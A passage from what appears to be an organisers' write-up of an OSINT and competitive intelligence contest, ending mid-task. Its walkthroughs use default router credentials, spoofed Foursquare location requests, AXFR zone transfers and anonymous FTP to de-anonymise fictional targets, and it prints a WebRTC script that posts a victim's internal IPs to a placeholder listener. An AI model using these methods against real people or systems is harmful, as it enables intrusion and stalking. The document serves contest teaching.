class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-PNo9Fo9p15s/U8YNAzo_RRI/AAAAAAAAEIM/8fwHfktuccQ/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-PNo9Fo9p15s/U8YNAzo_RRI/AAAAAAAAEIM/8fwHfktuccQ/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F1.png" /></a></div>This time tasks were more difficult as compared to the last year's contest. A competitive intelligence researcher needs a great number of different skills and should be able to handle various tools and plugins. That's why we decided to make tasks more challenging. However, traditional requirements for deductive thinking and the ability to find links between data are still applicable.<br /><br /><b><span style="font-size: large;">1. Intro</span></b><br /><br />According to the plot of the contest, a participant finds himself to be a new member of Anneximous, an underground gang. He is given a task of finding an email address of an employee at ATH:<br /><br /><blockquote class="tr_bq">Hi, </blockquote><blockquote class="tr_bq">I heard you wanted to join the Anneximous group. That’s fine but you should prove you’re worth it. </blockquote><blockquote class="tr_bq">Rumor has it that feds are close to us. Those dumbasses from ATH (Bureau of Alcohol, Tobacco, Hackers and Cookies) must be spying on us! </blockquote><blockquote class="tr_bq">Teach one of the agents a lesson and maybe we’ll accept you. Get his email address.<br />We made the first task simple so as not to scare off participants. They just needed to google it.</blockquote><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-6j9h_RwQa1U/U8YNRYGnT3I/AAAAAAAAEIU/lpoVgZz8xv4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-6j9h_RwQa1U/U8YNRYGnT3I/AAAAAAAAEIU/lpoVgZz8xv4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F2.png" height="268" width="640" /></a></div><br /><b>Solved by:</b> 82 participants<br /><br /><b><span style="font-size: large;">2. Reprisal against competitors</span></b><br /><br />Now the participant is assigned to gather information about hackers from World Wide Idol, who knows nothing about ethics, and to turn them over to the leaders of ATH:<br /><br /><blockquote class="tr_bq">You succeeded, but that task was for kiddies. The point is we have been competing with a group called World White Idol for a long time. They are exceptionally bad guys without any ethics or respect for old people. It’s time to destroy those displeasing internet maniacs! </blockquote><blockquote class="tr_bq">The plan is to expose the members of this group to ATH and we’ll be alone on the throne! </blockquote><blockquote class="tr_bq">p.s. Actually, they’ve already started to hunt us<br />(http://athc.biz/docs/137b60bcec2014fcedca10cc5f89bfb4.docx), so be careful and go look for these scumbags:</blockquote><br /><b>2.1 Catching a script kiddie in Foursquare</b><br /><br /><b>Nickname:</b> Schoolkid<br /><br /><b>About</b>: The script kiddie is hacking everything he sees, not paying attention to anonymity.<br /><br /><b>Development: </b>Detected while hacking sites from the same IP address: 107.170.230.201.<br /><br /><b>Hint:</b> New info came up that the hacker is connecting from a public network. Thanks to Foursquare. Who the heck is using this thing after all?<br /><br />The script kiddie has been caught attacking from IP <b>107.170.230.201</b>. There we can see a wireless router with the default combination (<b>admin:admin</b>).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-AqVDzqVUSIw/U8YNwzPtGFI/AAAAAAAAEIc/oAvWTYpHRE8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-AqVDzqVUSIw/U8YNwzPtGFI/AAAAAAAAEIc/oAvWTYpHRE8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F3.png" height="450" width="640" /></a></div><br /><br />It's Rodrigez's family router located at <b>#45.647801,-84.494360</b> (http://107.170.230.201/?page=geo.cgi).<br /><br />According to clickstream data logged in the router, there were many requests sent to Foursquare services.<br /><br />In the application's requests sent to Foursquare, we change geolocation data for those data that were entered while checking in:<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /v2/users/updatelocation HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: api.foursquare.com</span><br /><span style="font-family: Courier New, Courier, monospace;">ll=45.647801,-84.494360&[…]</span><br /><span style="font-family: Courier New, Courier, monospace;">GET /v2/venues/search?ll=45.647801,-84.494360&[…]HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: api.foursquare.com</span><br /><br />Enter Rodrigez in the search field and find the place…<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-uhXVCIrdkoQ/U8YOZl6HmBI/AAAAAAAAEI0/WfsO8LaHVYs/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.19.36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-uhXVCIrdkoQ/U8YOZl6HmBI/AAAAAAAAEI0/WfsO8LaHVYs/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.19.36.png" height="355" width="400" /></a></div><br /> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-VctNyNMKJlk/U8YOhCUlUnI/AAAAAAAAEI8/4v0VEbKgxXo/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.19.47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-VctNyNMKJlk/U8YOhCUlUnI/AAAAAAAAEI8/4v0VEbKgxXo/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.19.47.png" height="348" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /> <br />… and the hacker we were looking for—<b>Antony Kiddies</b>.<br /><br /><b>Solved by:</b> 6 participants<br /><br /><b>Points: </b>15<br /><br /><b>2.2. Looking for a Japanese businessman from WWIdol</b><br /><b><br /></b><b>Nickname: </b>Japanese Businessman<br /><br /><b>About: </b>Record of conviction: ATH case #126.<br /><br /><b>Hint:</b> ATH have a single database for the profiles of Anneximous and WWIdol. Look deeper at athc.biz. Also, check out this service for Japanese hieroglyphs recognition — <a href="http://appsv.ocrgrid.org/nhocr/">http://appsv.ocrgrid.org/nhocr/</a>.<br /><br />We have a link to this "case" and we know the number of the businessman's file that we should find. Obviously, we will find something useful there.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LMSPqce125M/U8YO0aXAO9I/AAAAAAAAEJE/B9mY_yPxgEU/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.20.06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-LMSPqce125M/U8YO0aXAO9I/AAAAAAAAEJE/B9mY_yPxgEU/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.20.06.png" height="86" width="640" /></a></div><br />We follow the link and find out that the hash is MD5 (“123456.7”): <br /><br /><a href="https://www.google.ru/search?q=137b60bcec2014fcedca10cc5f89bfb4">https://www.google.ru/search?q=137b60bcec2014fcedca10cc5f89bfb4</a><br /><br />The link 123456.126 with hash d39558559e10be6b4e36ca6a5a55bf79 should take us to the person we need to find; and so the document is located at:<br /><br /><a href="http://athc.biz/docs/d39558559e10be6b4e36ca6a5a55bf79.docx">http://athc.biz/docs/d39558559e10be6b4e36ca6a5a55bf79.docx</a><br /><br />By the way, the task was inspired by the much-talked-of competitive intelligence case on hacking Gartner via address bar.<br /><br />After opening the link at athc.biz, you will find a photo of a document. Then copy the title in the top left-hand corner of the photo, enlarge it and run through the translation service, a link to which is given in the hint, and then run it through Google Translate and see the name: <b>Haru Sakata</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-jviSDw5gioQ/U8YPD5jCW6I/AAAAAAAAEJM/8ymrOXPyPtg/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-jviSDw5gioQ/U8YPD5jCW6I/AAAAAAAAEJM/8ymrOXPyPtg/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F4.png" height="299" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-KbXhcjdNslc/U8YPS1XzupI/AAAAAAAAEJU/3UF0pFZq-Is/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-KbXhcjdNslc/U8YPS1XzupI/AAAAAAAAEJU/3UF0pFZq-Is/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F5.png" height="310" width="640" /></a></div><br /><br />And here's what happens if you don't enlarge the image:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YyNEXkZ2pwc/U8YPXv0hvmI/AAAAAAAAEJc/eXzF64Mx0Mo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-YyNEXkZ2pwc/U8YPXv0hvmI/AAAAAAAAEJc/eXzF64Mx0Mo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F6.png" height="198" width="640" /></a></div><br /><br />The task is not solved yet; the participants should still find out the businessman's birthdate and place of work.<br /><br />There are four users named <b>Haru Sakata</b> on Twitter. The contest's organizers made up three accounts especially for the contest. Google Images can help to tell the "real" account by showing, for instance, that the particular person is a famous Japanese actor.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-zDO0DbaRdRI/U8YPngvQdxI/AAAAAAAAEJk/PlIEUJ1tskw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-zDO0DbaRdRI/U8YPngvQdxI/AAAAAAAAEJk/PlIEUJ1tskw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F7.png" height="344" width="640" /></a></div><br /><br /><b>Solved by: </b>4 participants<br /><br /><b>Points:</b> 20<br /><br /><b>2.3 Looking for a French lawyer</b><br /><b><br /></b><b>Nickname:</b> Counsel<br /><br /><b>About:</b> ATH case: <a href="http://athc.biz/docs/46a2934643bf3f80c530aee55195594d.docx">http://athc.biz/docs/46a2934643bf3f80c530aee55195594d.docx</a>.<br /><br />ATH has plenty of data about this person: name, e-mail and even a piece of a photo. The original photo can be found at: <a href="zip://46a2934643bf3f80c530aee55195594d.docx/word/media/image2.emf">zip://46a2934643bf3f80c530aee55195594d.docx/word/media/image2.emf</a><br /><br />Things are getting clearer now: this metal thing here is not by chance, it definitely means that the person has something to do with Paris.<br /><br />However, 5 participants couldn't tell the the real <b>counsel</b> from his twins with same photos but without any relation to Paris.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ODpKpYBW7QQ/U8YP0YkjPVI/AAAAAAAAEJs/B_gRo1FFDYo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ODpKpYBW7QQ/U8YP0YkjPVI/AAAAAAAAEJs/B_gRo1FFDYo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F8.png" /></a></div><br /><br /><b>Solved by:</b> 9 participants<br /><br /><b>Points:</b> 20<br /><br /><b>2.4. Third-level domains and a Facebook account</b><br /><br /><b>Nickname: </b>PakistaniChristian<br /><br /><b>About:</b> Yo dawg, I heard you like subdomains, so I put three levels in yo subdomains so you can use subdomains while yo surf domains.<br /><br /><b>Hint:</b> We got data that their domain is ftp.wwidol.com.<br /><br /><b>Hint 2:</b> You are still looking in wrong places. Why do you think there is an e-mail?<br /><br />The only thing we didn't consider in the checking mechanism was that the contest's participants (or organizers) could mix up first and last names and then none of the answers would be correct.<br /><br />Though the task was quite simple: find the domain of <a href="http://ftp.wwidol.com/">ftp.wwidol.com</a> (via brute-forcing or sending AXFR requests, which are allowed in the domain wwidol.com) that allows anonymous access to the FTP protocol. There's good old thumbs.db from the Windows XP age in the folder /images_upload/.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FROfwr32t_s/U8YQHIOB9rI/AAAAAAAAEJ0/huQSbB_FxXk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-FROfwr32t_s/U8YQHIOB9rI/AAAAAAAAEJ0/huQSbB_FxXk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F9.png" height="185" width="400" /></a></div><br /> This file contains certain thumbnails and provides names of the images that were cached by the operating system.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ZtP-dUl08qY/U8YQO8W6HiI/AAAAAAAAEJ8/-ngd6MtHhng/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ZtP-dUl08qY/U8YQO8W6HiI/AAAAAAAAEJ8/-ngd6MtHhng/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F10.png" height="210" width="320" /></a></div><br />E-mail won't help this time, we'd better recall other de-anonymization techniques.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-REAtUd-M1pg/U8YQWRUxneI/AAAAAAAAEKE/vEGjBOyZ3Yw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-REAtUd-M1pg/U8YQWRUxneI/AAAAAAAAEKE/vEGjBOyZ3Yw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F11.png" height="286" width="400" /></a></div><br /><br />Having the photo of the person helps to tell the "real" accounts from fake.<br /><br /><b>Solved by:</b> 5 participants<br /><br /><b>Points:</b> 20<br /><br /><b>2.5. Breaking through to ATH</b><br /><b><br /></b><b>Nickname:</b> <a href="mailto:johnsmith@athc.biz">johnsmith@athc.biz</a><br /><b><br /></b><b>Hint:</b> We’ve managed to track the IP address of ATH which they use to access the internet. You may use this exploit to obtain the internal IP: <a href="http://net.ipcalf.com/">http://net.ipcalf.com/</a>.<br /><br />Now the participants should find information about ATH's employee named John Smith. In you send an e-mail to johnsmith@athc.biz, you will receive a reply with two hints.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Eqo2vtV-Jhk/U8YQmhFJXQI/AAAAAAAAEKM/CgrDwPl2Xz0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Eqo2vtV-Jhk/U8YQmhFJXQI/AAAAAAAAEKM/CgrDwPl2Xz0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F12.png" height="154" width="320" /></a></div><br /> The first one was that something similar to antivirus is checking all the links in emails for viruses, or maybe for some other purposes.<br /><br />And the other: the router NetGear N600 is gazing at the internet, and it contains interesting vulnerabilities: <a href="http://www.exploit-db.com/exploits/32883/">http://www.exploit-db.com/exploits/32883/</a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-nr1W40QBXeY/U8YQvLNEvCI/AAAAAAAAEKU/gEhdQYfenyM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-nr1W40QBXeY/U8YQvLNEvCI/AAAAAAAAEKU/gEhdQYfenyM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F13.png" height="166" width="320" /></a></div><br />What happens if we add a link to our resource to the "antivirus":<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-n6VBz5ybhIo/U8YQ0zs8C4I/AAAAAAAAEKc/Bfl-9R1Mhvc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-n6VBz5ybhIo/U8YQ0zs8C4I/AAAAAAAAEKc/Bfl-9R1Mhvc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F14.png" height="33" width="400" /></a></div><br /> The router with the mentioned vulnerabilities is actually located at IP 162.243.77.131. Exploitation of these vulnerabilities allows getting, say, an admin password despite HTTP 401:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qYJ2wJ7qSUQ/U8YQ-KwbEFI/AAAAAAAAEKk/2uNB7u0d5hY/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qYJ2wJ7qSUQ/U8YQ-KwbEFI/AAAAAAAAEKk/2uNB7u0d5hY/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F15.png" height="165" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Sy39JI-myA8/U8YRHP5aobI/AAAAAAAAEKs/tIj-mKrQuZE/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Sy39JI-myA8/U8YRHP5aobI/AAAAAAAAEKs/tIj-mKrQuZE/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F16.png" height="147" width="400" /></a></div><br />This router model has more features: logo's attached to the page's footer (as many providers do today), SMB Manager, which allows access to an internal network by using Java Applet—you just need to know an IP address.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ORH_Syt2Ntw/U8YRO9ouX1I/AAAAAAAAEK0/b81b2ElMsV4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ORH_Syt2Ntw/U8YRO9ouX1I/AAAAAAAAEK0/b81b2ElMsV4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F17.png" height="241" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-n8iuDiT2oPk/U8YRWTAy9UI/AAAAAAAAEK8/KxzWguXapQk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-n8iuDiT2oPk/U8YRWTAy9UI/AAAAAAAAEK8/KxzWguXapQk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F18.png" height="285" width="400" /></a></div><br /><br />The hint shows that the IP address can be found in the footer changing form for HTML pages and by modification of the exploit given in the hint.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-x5pmrVM6Txg/U8Yf3h4i9CI/AAAAAAAAELM/Ffm6IFHi0JQ/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-x5pmrVM6Txg/U8Yf3h4i9CI/AAAAAAAAELM/Ffm6IFHi0JQ/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F20.png" height="296" width="400" /></a></div><br /><br /><span style="font-family: Courier New, Courier, monospace;"><script></font></p><p><font face="Courier New, Courier, monospace">var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection;</font></p><p><font face="Courier New, Courier, monospace">if (RTCPeerConnection) (function () {</font></p><p><font face="Courier New, Courier, monospace"> var rtc = new RTCPeerConnection({iceServers:[]});</font></p><p><font face="Courier New, Courier, monospace"> if (window.mozRTCPeerConnection) { </font></p><p><font face="Courier New, Courier, monospace"> rtc.createDataChannel('', {reliable:false});</font></p><p><font face="Courier New, Courier, monospace"> };</font></p><p><font face="Courier New, Courier, monospace"> rtc.onicecandidate = function (evt) {</font></p><p><font face="Courier New, Courier, monospace"> if (evt.candidate) grepSDP(evt.candidate.candidate);</font></p><p><font face="Courier New, Courier, monospace"> };</font></p><p><font face="Courier New, Courier, monospace"> rtc.createOffer(function (offerDesc) {</font></p><p><font face="Courier New, Courier, monospace"> grepSDP(offerDesc.sdp);</font></p><p><font face="Courier New, Courier, monospace"> rtc.setLocalDescription(offerDesc);</font></p><p><font face="Courier New, Courier, monospace"> }, function (e) { console.warn("offer failed", e); });</font></p><p><font face="Courier New, Courier, monospace"> var addrs = Object.create(null);</font></p><p><font face="Courier New, Courier, monospace"> addrs["0.0.0.0"] = false;</font></p><p><font face="Courier New, Courier, monospace"> function updateDisplay(newAddr) {</font></p><p><font face="Courier New, Courier, monospace"> if (newAddr in addrs) return;</font></p><p><font face="Courier New, Courier, monospace"> else addrs[newAddr] = true;</font></p><p><font face="Courier New, Courier, monospace"> var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });</font></p><p><font face="Courier New, Courier, monospace"> document.getElementById('list').value = displayAddrs.join(" or perhaps ") || "n/a";</font></p><p><font face="Courier New, Courier, monospace"><span class="Apple-tab-span" style="white-space:pre"> </span>document.form.submit();</font></p><p><font face="Courier New, Courier, monospace"> }</font></p><p><font face="Courier New, Courier, monospace">function grepSDP(sdp) {</font></p><p><font face="Courier New, Courier, monospace"> var hosts = [];</font></p><p><font face="Courier New, Courier, monospace"> sdp.split('\r\n').forEach(function (line) { </font></p><p><font face="Courier New, Courier, monospace"> if (~line.indexOf("a=candidate")) { </font></p><p><font face="Courier New, Courier, monospace"> var parts = line.split(' '), </font></p><p><font face="Courier New, Courier, monospace"> addr = parts[4],</font></p><p><font face="Courier New, Courier, monospace"> type = parts[7];</font></p><p><font face="Courier New, Courier, monospace"> if (type === 'host') updateDisplay(addr);</font></p><p><font face="Courier New, Courier, monospace"> } else if (~line.indexOf("c=")) { </font></p><p><font face="Courier New, Courier, monospace"> var parts = line.split(' '),</font></p><p><font face="Courier New, Courier, monospace"> addr = parts[2];</font></p><p><font face="Courier New, Courier, monospace"> updateDisplay(addr); } }); }})(); else {}</font></p><p><font face="Courier New, Courier, monospace"></script></span><br /><form action="http://listenhost:port/" method="post" name="form"><span style="font-family: Courier New, Courier, monospace;"><input id="list" name="value" type="text" /></span></form><span style="font-family: Courier New, Courier, monospace;"></span><br />As a result:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-E_CauD1wuo0/U8YgEEuoe7I/AAAAAAAAELU/nEYHpl7Cwhc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-E_CauD1wuo0/U8YgEEuoe7I/AAAAAAAAELU/nEYHpl7Cwhc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F21.png" height="197" width="400" /></a></div><br />We also received greetings from one of the participants. That was sweet.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-D9BbXKRUX9A/U8YgKVF384I/AAAAAAAAELc/CVVLCerv7vw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-D9BbXKRUX9A/U8YgKVF384I/AAAAAAAAELc/CVVLCerv7vw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F22.png" height="320" width="311" /></a></div><br />Now we can try to get access to John Smith's computer and find answers on the questions:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-LMs_hkvhSRQ/U8YgRwfcGcI/AAAAAAAAELk/H2FrgjVQO9g/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LMs_hkvhSRQ/U8YgRwfcGcI/AAAAAAAAELk/H2FrgjVQO9g/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F23.png" height="95" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-69xrYC5CVNE/U8YgYtdmvJI/AAAAAAAAELs/pQIPc2MAb0k/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-69xrYC5CVNE/U8YgYtdmvJI/AAAAAAAAELs/pQIPc2MAb0k/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F24.png" height="72" width="400" /></a></div><br /><br /><b>Solved by:</b> 2 participants<br /><br /><b>Points:</b> 35<br /><br /><i>Note:</i> this task as well as the following ones "produced" new tasks upon solving them.<br /><br /><b>3.1 Trying to engage a girl into a conversation at a dating site</b><br /><br /><b>Nickname:</b> Stripper<br /><br /><b>About:</b> "Talky" girl, doesn't separate private life from the job. Her probable location is #53.2054508, 63.6218262. She uses dating sites for finding clients.<br /><br />Two participants found the girl on Facebook and Vkontakte.<br /><br />In 